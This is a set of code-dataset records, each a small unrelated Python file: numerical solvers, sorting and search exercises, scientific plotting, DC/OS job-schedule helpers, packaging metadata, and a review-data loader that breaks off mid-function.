+{"seq_id":"271995652","text":"import numpy as np\r\nimport cvxpy as cp\r\n\r\nfrom indexingFunctions import *\r\n\r\ndef distributionConstraints(n, x):\r\n    constr = []\r\n    constr += [x >= 0]\r\n    constr += [cp.sum(x[allIndex(n)]) == 1]\r\n    constr += [cp.sum(x[marginal_1(n, 0)]) == 0]\r\n\r\n    return constr\r\n\r\ndef distributionConstraintsDual(dconstr):\r\n    d = []\r\n    for i in range(len(dconstr)):\r\n        d += [dconstr[i].dual_value]\r\n\r\n    return d\r\n\r\ndef checkDistributionConstraints(n, x, y, z, acc, verbose=True):\r\n    constr = True\r\n    constr = constr and (y >= -acc).all()\r\n    constr = constr and (np.abs(np.sum(x) - 1) <= acc)\r\n    constr = constr and (np.abs(np.sum(y) - 1) <= acc)\r\n    constr = constr and (np.abs(np.sum(z) - 1) <= acc)\r\n    constr = constr and (np.abs(z[0]) <= acc)\r\n\r\n    if verbose:\r\n        print(\"sum x : \", np.sum(x))\r\n        print(\"sum y : \", np.sum(y))\r\n        print(\"sum z : \", np.sum(z))\r\n        print(\"########## value of x ##########\")\r\n        print(x)\r\n        print(\"========== value of y ==========\")\r\n        print(y)\r\n        print(\"---------- value of z ----------\")\r\n        print(z)\r\n\r\n    return constr\r\n","sub_path":"source/distributionConstraints.py","file_name":"distributionConstraints.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"643594384","text":"from random import random\nN = 128\narray = []\nfor i in range(N):\n    array.append(int(random()*100))\narray.sort()\nprint(array)\n\nnumber = int(input())\n\nlow = 0\nhigh = N-1\ncount = 0\n\nwhile low <= high:\n    count += 1\n\n    mid = (low + high) // 2\n    if number < array[mid]:\n        high = mid - 1\n    elif number > array[mid]:\n        low = mid + 1\n    else:\n        print(\"ID =\", mid + 1, count)\n        break\nelse:\n    print(\"Number not found\", count)\n","sub_path":"venv/Include/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"364835757","text":"from __future__ import print_function\nfrom hpgmg.finite_volume.operators.base_operator import BaseOperator\nfrom 
hpgmg.finite_volume.operators.smoother import Smoother\n\n__author__ = 'Shiv Sundram shivsundram@berkeley.edu U.C. Berkeley, shivsundram@lbl.gov, LBNL'\n\n# Based on Yousef Saad's Iterative Methods for Sparse Linear Algebra, Algorithm 12.1, page 399\n# with algorithmic corrections provided by Sam Williams\n\n\nclass ChebyshevSmoother(Smoother):\n def __init__(self, op, degree=4, iterations=10):\n \"\"\"\n :param op:\n :param degree:\n :param iterations:\n :return:\n \"\"\"\n assert isinstance(op, BaseOperator)\n assert isinstance(degree, int)\n assert isinstance(iterations, int)\n\n self.operator = op\n self.iterations = iterations\n self.degree = degree\n\n\n def smooth(self, level, mesh_to_smooth, rhs_mesh):\n \"\"\"\n\n :param level: the level being smoothed\n :param mesh_to_smooth:\n :param rhs_mesh:\n :return:\n \"\"\"\n beta = 1.000*level.dominant_eigen_value_of_d_inv_a\n alpha = 0.125000*beta\n theta = 0.5*(beta+alpha)\t\t# center of the spectral ellipse\n delta = 0.5*(beta-alpha)\t\t# major axis?\n sigma = theta/delta\n rho_n = 1/sigma\t\t\t# rho_0\n chebyshev_c1 = [float] * self.degree # + c1*(x_n-x_nm1) == rho_n*rho_nm1\n chebyshev_c2 = [float] * self.degree # + c2*(b-a_x_n)\n chebyshev_c1[0] = 0.0\n chebyshev_c2[0] = 1/theta\n for s in range(1, self.degree): # generate chebyshev polynomial coefficients\n rho_nm1 = rho_n\n rho_n = 1.0/(2.0*sigma - rho_nm1)\n chebyshev_c1[s] = rho_n*rho_nm1\n chebyshev_c2[s] = rho_n*2.0/delta\n\n self.operator.set_scale(level.h)\n\n need_copy = False\n for s in range(self.degree*self.iterations): # need to store 2 prev src meshes\n if (s & 1) == 0:\n working_source = mesh_to_smooth\n working_source_prev = level.temp\n working_target = level.temp\n else:\n working_source = level.temp\n working_source_prev = mesh_to_smooth\n working_target = mesh_to_smooth\n\n c1 = chebyshev_c1[s % self.degree]\n c2 = chebyshev_c2[s % self.degree]\n\n lambda_mesh = level.d_inverse\n\n level.solver.boundary_updater.apply(level, working_source)\n for index in level.interior_points():\n a_x = self.operator.apply_op(working_source, index, level)\n b = rhs_mesh[index]\n working_target[index] = working_source[index] + (\n c1 * (working_source[index] - working_source_prev[index]) +\n c2 * lambda_mesh[index] * (b - a_x)\n )\n need_copy = not need_copy\n\n if need_copy:\n level.copy_mesh(mesh_to_smooth, level.temp)\n","sub_path":"hpgmg/finite_volume/operators/chebyshev_smoother.py","file_name":"chebyshev_smoother.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"397438494","text":"\nfrom Sire.Tools import WSRC\nfrom Sire.IO import *\nfrom Sire.Maths import *\nfrom Sire.Mol import *\n\nimport Sire.Stream\n\n(waters, space) = Amber().readCrdTop(\"../io/waterbox.crd\", \"../io/waterbox.top\")\n\nprint(space.dimensions())\n\nligand = Sire.Stream.load(\"../io/ligand.s3\")\nligand = ligand.move().translate( -ligand.evaluate().center() ).commit()\nligand = ligand.move().translate( 0.5 * space.dimensions() ).commit()\n\noverlaps = WSRC.getOverlapWaters(ligand, waters)\n\nprint(overlaps)\n\nswap = MoleculeGroup(\"swap\")\n\nfor overlap in overlaps:\n swap.add( overlap.molecule() )\n\nPDB().write(ligand, \"ligand.pdb\")\nPDB().write(swap, \"waters.pdb\")\n\nif __name__ == \"__main__\":\n 
print(\"OK\")\n","sub_path":"python/tests/Tools/test_idpoints.py","file_name":"test_idpoints.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"333156842","text":"# a tuple is similar to a list but their values cannot be changed \n# keword arguements are arguements that are already defined \n\ndef get_age():\n print(\"How old are you ?\") \n try:\n age = int(input())\n return age \n except ValueError:\n return \"That was not valid input\" \nget_age() ","sub_path":".history/module_test1_20200420162004.py","file_name":"module_test1_20200420162004.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"650702146","text":"from tools import GridDefinition\nfrom PyQt4 import QtCore\n\ndefault_setting = {\n \"location_dir\" : \"\",\n \"docking_program\" : None,\n \"project_name\": \"Docking_Project\",\n \"pH\": 7.4,\n \"protein_name\": \"protein\",\n \"ligand_name\": \"ligand\",\n \"ligands\": None,\n \"metals\": None,\n \"selected_ligand\": None,\n \"grid_def\": 'auto',\n \"rmsd_tolerance\": 2,\n \"energy_range\": 3,\n \"cpu\": 1,\n \"exhaustiveness\": \"auto\",\n \"poses_vina\": 10,\n \"total_poses\": 500,\n \"protein_file\": \"\",\n \"ligand_file\": \"\",\n \"working_dir\": \"\",\n \"input_dir\": 'input',\n \"result_dir\": 'results'\n}\n\n\ndef values(self, k): # ok\n if k.objectName() == 'horizontalSlider':\n self.parent.cpu = self.horizontalSlider.value()\n self.cpu_label.setText(\"%s\" % self.parent.cpu + \" CPU in use of %s\" % self.number_cpu)\n elif k.objectName() == 'pH_value':\n self.parent.pH = self.pH_value.value()\n elif k.objectName() == 'nposes_value':\n self.parent.poses_vina = self.nposes_value.value()\n elif k.objectName() == \"exh_value\":\n self.parent.exhaustiveness = self.exh_value.value()\n\ndef check_res(self):\n try:\n self.check = GridDefinition(self.parent.input_protein, self.grid_predef_text.text())\n error = self.check.check_select()\n except: error = 1\n if error == 0:\n self.checker_icon_ok.show()\n self.checker_icon.hide()\n self.run_button.setEnabled(True)\n else:\n self.checker_icon.show()\n self.checker_icon_ok.hide()\n self.run_button.setEnabled(False)\n\n\n\ndef progress(self, form, phase, value=None, finish=False, reverse=False, time=0, mess=''):\n if phase == 0:\n stage = 'Initial Configuration: '\n elif phase == 1:\n stage = 'Prepare Input Files: '\n elif phase == 2:\n stage = 'Binding Site Definition: '\n else:\n stage = 'Molecular Docking Simulation: '\n timems = time*1000\n if form == 0:\n if reverse:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess)\n else:\n if finish:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage+mess+'Done.')\n else:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess)\n\n elif form == 1:\n if reverse:\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess)\n else:\n if finish:\n self.timeline.stop()\n self.progressBar.setValue(value)\n # self.progressBar_label.setText(stage + mess+'Done.')\n\n else:\n self.previous_value = self.progressBar.value()\n self.timeline = QtCore.QTimeLine(timems)\n self.timeline.setFrameRange(0, (value - self.previous_value)-1)\n self.timeline.frameChanged.connect(lambda i: self.progressBar.setValue(self.previous_value + i))\n self.timeline.start()\n # self.progressBar_label.setText(stage+mess)\n 
elif form == 3:\r\n        if reverse:\r\n            self.progressBar.setValue(value)\r\n            # self.progressBar_label.setText(stage + mess)\r\n        else:\r\n            if finish:\r\n                self.progressBar.setValue(value)\r\n                # self.progressBar_label.setText(stage + mess + 'Done.')\r\n            else:\r\n                self.progressBar.setValue(value[0] + value[1])\r\n                # self.progressBar_label.setText(stage + mess)\r\n\r\n","sub_path":"Lib/site-packages/AMDock/some_slots.py","file_name":"some_slots.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"532968971","text":"#https://stackabuse.com/sorting-algorithms-in-python/\n\nimport time\nimport random\n\ndef bubbleSort(num_list):\n\tfor i in range(len(num_list)):\n\t\tfor j in range(len(num_list) - 1):\n\t\t\tif num_list[j] > num_list[j + 1]:\n\t\t\t\tnum_list[j], num_list[j + 1] = num_list[j + 1], num_list[j]\n\n\treturn num_list\n\ndef selectionSort(num_list):\n\tfor i in range(len(num_list)):\n\t\tlowestValueIndex = i\n\t\tfor j in range(i + 1, len(num_list)):\n\t\t\tif num_list[j] < num_list[lowestValueIndex]:\n\t\t\t\tlowestValueIndex = j\n\t\tnum_list[i], num_list[lowestValueIndex] = num_list[lowestValueIndex], num_list[i]\n\n\treturn num_list\n\ndef insertionSort(num_list):\n\tfor i in range(1, len(num_list)):\n\t\tkey = num_list[i]\t# value being inserted into the sorted prefix\n\t\tj = i - 1\n\t\twhile j >= 0 and num_list[j] > key:\n\t\t\tnum_list[j + 1] = num_list[j]\t# shift larger items one slot right\n\t\t\tj -= 1\n\t\tnum_list[j + 1] = key\n\n\treturn num_list\n\ndef quickSortPartition(num_list, low, high):\n\tpivotPoint = num_list[(low + high) // 2]\n\ti = low - 1\n\tj = high + 1\n\twhile True:\n\t\ti += 1\n\t\twhile num_list[i] < pivotPoint:\n\t\t\ti += 1\n\n\t\tj -= 1\n\t\twhile num_list[j] > pivotPoint:\n\t\t\tj -= 1\n\n\t\tif i >= j:\n\t\t\treturn j\n\n\t\tnum_list[i], num_list[j] = num_list[j], num_list[i]\n\ndef quickSort(num_list):\n\tdef _quickSort(items_list, low, high):\n\t\tif low < high:\n\t\t\tsplitIndex = quickSortPartition(items_list, low, high)\n\t\t\t_quickSort(items_list, low, splitIndex)\n\t\t\t_quickSort(items_list, splitIndex + 1, high)\n\t\n\t_quickSort(num_list, 0, len(num_list) - 1)\n\n\treturn num_list\n\ndef calcTime(func, args):\n\tstartTime = time.perf_counter()\n\tfunc(list(args))\t# sort a copy so every algorithm is timed on the same unsorted input\n\tactualEndTime = time.perf_counter() - startTime\n\tformatEndTime = '{:.15f}'.format(float(actualEndTime))\n\n\treturn formatEndTime, actualEndTime\n\nif __name__ == '__main__':\n\trandomNumList = [random.randint(0, 10000) for iter in range(100000)]\n\n\tbubbleSortTime, actualBubbleSortTime = calcTime(bubbleSort, randomNumList)\n\tselectionSortTime, actualSelectionSortTime = calcTime(selectionSort, randomNumList)\n\tinsertionSortTime, actualInsertionSortTime = calcTime(insertionSort, randomNumList)\n\tquickSortTime, actualQuickSortTime = calcTime(quickSort, randomNumList)\n\n\tprint(f'Time for bubble sort: {bubbleSortTime}s')\n\tprint(f'Time for selection sort: {selectionSortTime}s')\n\tprint(f'Time for insertion sort: {insertionSortTime}s')\n\tprint(f'Time for quick sort: {quickSortTime}s')\n\t","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"557025417","text":"#!/usr/bin/env python3\n\nfrom collections import defaultdict\nfrom math import ceil\n\nimport sys\n\nmaterial = defaultdict(list)  # [amount, (input, amount)]\n\n\ndef parse_amount_and_name(element):\n    amount, name = element.split()\n    return (int(amount), name)\n\n\ndef parse_input(filename):\n    with 
open(filename) as fin:\n for line in fin:\n inputs, output = line.strip(\"\\n\").split(\"=>\")\n out_amount, out_name = parse_amount_and_name(output)\n material[out_name].append(out_amount)\n for input_element in inputs.split(\", \"):\n in_amount, in_name = parse_amount_and_name(input_element)\n material[out_name].append((in_name, in_amount))\n\n\ndef analyze(target=\"FUEL\", raw=\"ORE\", amount=1):\n needed = defaultdict(int)\n needed[target] = amount\n left = defaultdict(int)\n while True:\n size = len(needed)\n if size == 1 and raw in needed:\n break\n keys = list(needed.keys())\n for current in keys:\n if current == raw:\n continue\n units = needed.pop(current)\n if current not in material: # 'ORE'\n continue\n multiple = ceil((units - left[current]) / material[current][0])\n left[current] = multiple * material[current][0] - units\n for (input_element, input_amount) in material[current][1:]:\n needed[input_element] += multiple * input_amount - left[input_element]\n left[input_element] = 0\n return needed[raw]\n\n\ndef binary_search():\n low = 0\n high = 1000000000000\n limit = 1000000000000\n while low < high:\n mid = (low + high) // 2\n need = analyze(amount=mid)\n if need > limit:\n high = mid - 1\n elif need < limit:\n low = mid + 1\n else:\n return mid\n return low - 1\n\n\nparse_input(sys.argv[1])\nore_for_1_fuel = analyze()\nprint(f\"1 unit of FUEL needs {ore_for_1_fuel} units of ORE\")\nmaximum = binary_search()\nprint(\n f\"Given 1 trillion ORE, {maximum} amount of FUEL can be produced, \"\n f\"costing {analyze(amount=maximum)} units of ORE\"\n)\n","sub_path":"14/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498537636","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Jobs holds jobs (metronome) methods called elsewhere in quarrier,\n particularly from cli.py\n\"\"\"\nimport copy\n\nfrom dcos import emitting, util\nfrom dcos.errors import DCOSException, DCOSHTTPException\n\nfrom quarrier import common, constants\n\nlogger = util.get_logger(__name__)\nutil.configure_process_from_environ()\n\nemitter = emitting.FlatEmitter()\n\n\ndef clean_json_for_job_post_put(job_json, remove_schedules_key=False):\n '''\n Checks that a metronome job json complies with defined keys in JOB_JSON_DEF_ALLOWED_KEYS\n It checks the given json, and keys that are not in the list are removed\n :param job_json: the object representation of a metronome job json for creation or update\n :type job_json: dict\n :returns: the json representation ready for put and post job operations\n :rtype: dict\n '''\n clean_job_json = copy.deepcopy(job_json)\n for key in clean_job_json:\n if key not in constants.JOB_JSON_DEF_ALLOWED_KEYS:\n del job_json[key]\n if key in [\"schedules\"] and remove_schedules_key:\n del job_json[key]\n\n schedules = job_json.get('schedules')\n if isinstance(schedules, list) and schedules:\n for index, value in enumerate(clean_job_json['schedules']):\n for key in value:\n if key not in constants.SCHEDULE_JSON_DEF_ALLOWED_KEYS:\n del job_json['schedules'][index][key]\n else:\n logger.debug(\"No schedules, nothing else to clean up \")\n\n return job_json\n\n\ndef add_schedules(job_id, schedules_json, client):\n \"\"\"\n :param job_id: Id of the job\n :type job_id: str\n :param schedules_json: json for the schedules\n :type schedules_json: json\n :param client: Metronome client instantiated in the caller\n :type client: dcos.metronome.Client\n :returns: process return code\n 
:rtype: int\n \"\"\"\n\n if schedules_json is None:\n raise DCOSException('Schedule JSON is required.')\n\n if type(schedules_json) is list:\n for schedule in schedules_json:\n client.add_schedule(job_id, schedule)\n else:\n client.add_schedule(job_id, schedules_json)\n\n emitter.publish('Successfully added schedule(s)')\n\n return 0\n\n\ndef update_schedules(job_id, original_job_schedules, new_job_schedules,\n client):\n \"\"\"\n Updates a Job schedules, merging schedules that persist, removing the ones\n not in the new list, creating the new ones\n :param job_id: Id of the job\n :type job_id: str\n :param original_job_schedules: original job json schedules\n :type original_job_schedules: [dict]\n :param new_job_schedules: new job json schedules\n :type new_job_schedules: [dict]\n :param client: Metronome client instantiated in the caller\n :type client: dcos.metronome.Client\n :returns: process return code\n :rtype: int\n \"\"\"\n\n if not isinstance(original_job_schedules, list) or not isinstance(\n new_job_schedules, list):\n raise DCOSException('Original or new schedules need to be lists.')\n\n if not new_job_schedules:\n # If new has no schedules, remove all schedules in old\n return remove_schedules(job_id, original_job_schedules, client)\n\n # Remove all keys in old not in new, and update those that are\n new_schedules_ids_list = [s.get('id') for s in new_job_schedules]\n for schedule in original_job_schedules:\n schedule_id = schedule['id']\n if schedule_id not in new_schedules_ids_list:\n _remove_schedule(job_id, schedule_id, client)\n logger.debug(\"Removed schedule '{}' from job '{}'\".format(\n schedule_id, job_id))\n else:\n try:\n # nsi is the new schedule index to get the new schedule\n # whose id is schedule_id\n nsi = common.get_index_dict_by_key_value(\n new_job_schedules, 'id', schedule_id)\n _update_schedule(job_id, new_job_schedules[nsi], client)\n logger.debug(\"Updated schedule '{}' for job '{}'\".format(\n schedule_id, job_id))\n except DCOSHTTPException as e:\n if e.response.status_code == 404:\n emitter.publish(\n \"Job '{}' and/or schedule '{}' does/do NOT exist.\"\n .format(job_id, schedule_id))\n except DCOSException as e:\n raise DCOSException(e)\n\n # Add the new not in the old\n original_schedules_ids_list = [s.get('id') for s in original_job_schedules]\n for schedule in new_job_schedules:\n schedule_id = schedule['id']\n if schedule_id not in original_schedules_ids_list:\n client.add_schedule(job_id, schedule)\n\n return 0\n\n\ndef _update_schedule(job_id, schedule_json, client):\n \"\"\"\n Updates the schedule whose id matches that of schedule_json\n with the schedule_json\n :param job_id: Id of the job\n :type job_id: str\n :param schedules_json: json for the schedules\n :type schedules_json: dict\n :param client: Metronome client instantiated in the caller\n :type client: dcos.metronome.Client\n :returns: process return code\n :rtype: int\n \"\"\"\n\n if schedule_json is None:\n raise DCOSException(\"No schedule to update.\")\n\n schedule_id = schedule_json.get('id')\n try:\n client.update_schedule(job_id, schedule_id, schedule_json)\n logger.info(\"Schedule ID `{}` for job ID `{}` updated.\".format(\n schedule_id, job_id))\n except DCOSHTTPException as e:\n if e.response.status_code == 404:\n emitter.publish(\n \"Job ID: '{}' or schedule ID '{}' does NOT exist.\".format(\n job_id, schedule_id))\n except DCOSException as e:\n raise DCOSException(e)\n\n return 0\n\n\ndef remove_schedules(job_id, schedules_json, client):\n \"\"\"\n Removes all of the 
schedules listed on the schedules_json\n    :param job_id: Id of the job\n    :type job_id: str\n    :param schedules_json: json for the schedules\n    :type schedules_json: dict | [dict]\n    :param client: Metronome client instantiated in the caller\n    :type client: dcos.metronome.Client\n    :returns: process return code\n    :rtype: int\n    \"\"\"\n\n    if schedules_json is None:\n        raise DCOSException('Schedule JSON is required.')\n\n    if type(schedules_json) is list:\n        for schedule in schedules_json:\n            schedule_id = schedule.get('id')\n            _remove_schedule(job_id, schedule_id, client)\n    else:\n        _remove_schedule(job_id, schedules_json.get('id'), client)\n\n    logger.info('Successfully removed all schedules for Job {}'.format(job_id))\n\n    return 0\n\n\ndef _remove_schedule(job_id, schedule_id, client):\n    \"\"\"\n    :param job_id: Id of the job\n    :type job_id: str\n    :param schedule_id: Id of the schedule\n    :type schedule_id: str\n    :returns: process return code\n    :rtype: int\n    \"\"\"\n    if schedule_id is None:\n        raise DCOSException('Schedule ID is required.')\n\n    try:\n        client.remove_schedule(job_id, schedule_id)\n    except DCOSHTTPException as e:\n        if e.response.status_code == 404:\n            raise DCOSException(\"Schedule or job ID does NOT exist.\")\n    except DCOSException as e:\n        raise DCOSException(\n            \"Unable to remove schedule ID '{}' for job ID '{}'\".format(\n                schedule_id, job_id))\n\n    return 0\n","sub_path":"quarrier/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"402172080","text":"def i_tri(s):\n    total = 140.6\n    rest = \"{0:.2f}\".format(total-s)\n\n    if s <= 0:\n        return 'Starting Line... Good Luck!'\n\n    if (s > 0 and s <= 2.4):\n        return {'Swim': rest+' to go!'}\n\n    if (s > 2.4 and s <= 114.4):\n        return {'Bike': rest+' to go!'}\n\n    if (s > 114.4 and s <= 130.6):\n        return {'Run': rest+' to go!'}\n\n    if (s > 130.6 and s < 140.6):\n        return {'Run': 'Nearly there!'}\n\n    if (s >= 140.6):\n        return \"You're done!  
Stop running!\"\n","sub_path":"Python/Ironman Triathlon.py","file_name":"Ironman Triathlon.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"499349107","text":"picture = makePicture(pickAFile())\ndef colourRectangleD(picture):\n width=getWidth(picture)\n height=getHeight(picture)\n y=0\n while (y < height/2):\n x=0\n while (x < width/2):\n px=getPixel(picture,x,y)\n setColor(px,red)\n x=x+1\n y=y+1 ","sub_path":"Week 05 - Modifying pictures using loops (contd.)/colourRectangleD.py","file_name":"colourRectangleD.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"254669232","text":"#!/usr/bin/env python\n\nfrom __future__ import division\nimport numpy as np\nimport pandas as pd\nimport bokeh.plotting as bplt \nfrom bokeh.models import ColumnDataSource, HBox, VBoxForm, BoxSelectTool,HoverTool\nfrom bokeh.models.widgets import Slider,TextInput\nfrom bokeh.io import curdoc, show, vform\n\n\ndef lineardiv(nx,c=1,sigma=0.5,tmax=1,xmax=3,):\n \n nt=int((tmax/xmax)*((nx-1)/(c*sigma))+1) # Time Grid\n \n x,dx=np.linspace(0,xmax,nx,retstep=True)\n t,dt=np.linspace(0,tmax,nt,retstep=True)\n \n # Initial conditions\n #\n # u=2 if 0.5 <= x <= 1\n # u=1 everywhere else in the support\n #u = np.ones_like(x)\n #u[np.where((.5<=x) & (x<=1))]=2\n U = np.ones((nt,nx))\n U[0][np.where((.5<=x) & (x<=1))]=2\n \n # Calculate the wave over the time\n for n in range(1,nt):\n for i in range(1,nx):\n U[n][i]= U[n-1][i] - U[n-1][i]*dt/dx* ( U[n-1][i]-U[n-1][i-1] )\n\n return U,x,t,dx,dt,nt\n\ndef plotcfg(height=600,width=800):\n plot = bplt.figure(plot_height=height, plot_width=width, \n title=\"Wave sliding\",\n tools=\"pan,resize,box_zoom,wheel_zoom,hover,reset,save,crosshair\",\n y_axis_label=\"Amplitude\",\n x_axis_label=\"Distance\")\n\n return plot\n\ndef drawgraph(plot,x,y):\n # Need to clean the image first\n plot.line(x,U[0],line_width=3, line_alpha=0.2, line_color=\"black\",line_dash=[6,3], legend=\"I.C\")\n plot.line(x,U[-1],line_width=3, line_alpha=0.6,legend=\"After\")\n plot.circle(x,U[-1],size=5)\n\n\nif __name__ == \"__main__\":\n U,x,t,dx,dt,nt=lineardiv(101)\n plot=plotcfg()\n drawgraph(plot,x,U[-1])\n\n slider = Slider(start=0, end=10, value=1, step=.1, title=\"Stuff\")\n\n bplt.output_file(\"slid.html\")\n layout = vform(slider,plot)\n show(layout)\n","sub_path":"python/CFD/slid.py","file_name":"slid.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"279283769","text":"lst = [1, 2, 3, 4, 5]\n\nlst_2_1 = [] # для цикла с while\nlst_2_2 = [] # для цикла с for\n\nfirst_item = lst.pop(0)\nlength = len(lst)\ntemporary = 0\n\nwhile length > 0:\n item = lst[temporary]\n lst_2_1.append(item)\n temporary += 1\n length -= 1\nelse:\n lst_2_1.append(first_item)\nprint(lst_2_1)\n\nfor i in lst:\n lst_2_2.append(i)\nelse:\n lst_2_2.append(first_item)\nprint(lst_2_2)\n","sub_path":"task_4_4.py","file_name":"task_4_4.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"93327774","text":"import logging\n\nfrom datapackage_pipelines.wrapper import ingest, spew\n\nparams, datapackage, res_iter = ingest()\n\ncolumn_aliases = params['column-aliases']\ncolumn_mapping = {}\nfor target, sources in column_aliases.items():\n if sources is 
not None:\n        for source in sources:\n            if source in column_mapping:\n                raise RuntimeError('Duplicate appearance of %s' % source)\n            column_mapping[source] = target\n    if target in column_mapping:\n        raise RuntimeError('Duplicate appearance of %s' % target)\n    column_mapping[target] = target\n\nresource_name = params.get('resource-name', 'concat')\nconcat_resource = {\n    'name': resource_name,\n    'path': 'data/'+resource_name+'.csv',\n    'mediatype': 'text/csv',\n    'schema': {\n        'fields': [],\n        'primaryKey': []\n    },\n}\n\nused_fields = set()\nfor resource in datapackage['resources']:\n    schema = resource.get('schema', {})\n    pk = schema.get('primaryKey', [])\n    for field in schema.get('fields', []):\n        orig_name = field['name']\n        if orig_name in column_mapping:\n            name = column_mapping[orig_name]\n            if name in used_fields:\n                continue\n            if orig_name in pk:\n                concat_resource['schema']['primaryKey'].append(name)\n            concat_resource['schema']['fields'].append(field)\n            field['name'] = name\n            used_fields.add(name)\n\ndatapackage['resources'] = [concat_resource]\n\n\ndef process_resources(_res_iter):\n    for rows_iter in _res_iter:\n        for row in rows_iter:\n            processed = dict((k, '') for k in used_fields)\n            values = [(column_mapping[k], v) for (k, v)\n                      in row.items()\n                      if k in column_mapping]\n            assert len(values) > 0\n            processed.update(dict(values))\n            yield processed\n\nspew(datapackage, [process_resources(res_iter)])\n","sub_path":"datapackage_pipelines/lib/concat.py","file_name":"concat.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"348404953","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name = 'eoepca-uma',\n    version = '0.2.4',\n    author = 'EOEPCA',\n    author_email = 'angel.lozano@deimos-space.com',\n    description = 'Python library to interact with UMA protocol',\n    long_description = long_description,\n    long_description_content_type=\"text/markdown\",\n    url = 'https://github.com/EOEPCA/um-common-uma-client ',\n    packages=setuptools.find_packages(),\n    license='apache-2.0',\n    keywords = ['UMA', 'Client', 'EOEPCA','user','management'],\n    classifiers=[\n        'Development Status :: 3 - Alpha',   # Choose either \"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\" as the current state of your package\n        'Intended Audience :: Developers',\n        'Topic :: Software Development :: Build Tools',\n    ],\n    python_requires='>=3.6',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"308786278","text":"import pandas as pd\nimport numpy as np\nimport gzip\nimport os\nimport json\nimport matplotlib \nimport matplotlib.pyplot as plt\n\nimport nltk\nfrom nltk.corpus import stopwords\nimport string\n\nimport textblob\nfrom textblob import TextBlob\n\n\ndata_dir = os.path.join('/Users/jiristodulka/GoogleDrive/GitHub/product_filter','data')\n\n\nclass DataLoad:\n    '''\n    Desc.\n    ''' \n    def __init__(self, data_dir):\n        self.data_dir = data_dir\n\n    def load_meta(self):\n        '''\n        Desc.: \n        - loads metadata that stores info about 'Movies & TV' ONLY\n        Input:\n        - By Default it takes the data from ./data directory\n        Returns:\n        - meta_df : pd.DataFrame object with info about items\n        \n        '''\n        meta = []\n        with gzip.open(self.data_dir +'/meta_Movies_and_TV.json.gz') as f:\n            for l in f:\n                meta.append(json.loads(l.strip()))\n        \n        self.meta_df = 
pd.DataFrame(meta)[['main_cat', 'title','asin']]\n        # keep only the 'Movies & TV' metadata rows, as the docstring states\n        self.meta_df = self.meta_df[self.meta_df['main_cat'] == 'Movies & TV']\n        return self.meta_df\n\n\n    def load_reviews(self):\n        '''\n        Desc.:\n        - Load Reviews\n        Input:\n        - By Default it takes the data from ./data directory\n        Returns:\n        reviews_df: pd.DataFrame object storing ALL the reviews for MULTIPLE CATEGORIES\n        \n        '''\n        reviews = []\n        for line in open(self.data_dir + '/Movies_and_TV_5.json', 'r'):\n            reviews.append(json.loads(line))\n        \n        self.reviews_df = pd.DataFrame(reviews)\n        return self.reviews_df\n\n    def merge_reviews_meta(self):\n        '''\n        \n        '''\n        self.merged_df = pd.merge(self.reviews_df, self.meta_df[['title', 'asin']],\n                    how = 'inner', left_on='asin', right_on = 'asin')\n        self.merged_df['char_count'] = self.merged_df['reviewText'].str.len()\n        return self.merged_df\n\n\ndef downsample_reviews(merged_df, rating_min = 10 ,length = [300,800]):\n    '''\n    Desc.: \n    - Subsets the merged_df input to extract only relevant records (\"Movies and TV\"):\n        1. selects only movies category\n        2. N/A\n        3. length of reviews in certain range\n        4. only certain # of reviews\n    Input:\n    - merged_df: output of merge_reviews_meta(reviews_df, meta_df)\n    - length: min and max length of reviews in range\n    - rating_min: minimum (and sampled) number of reviews per movie\n    \n    Returns:\n    downsampled reviews pd.DataFrame\n    '''\n    down_reviews_df = merged_df.copy()\n    \n    down_reviews_df['char_count'] = down_reviews_df['reviewText'].str.len()\n    down_reviews_df['sum_reviews'] = down_reviews_df.groupby('title')['title'].transform('count')\n\n    sample = 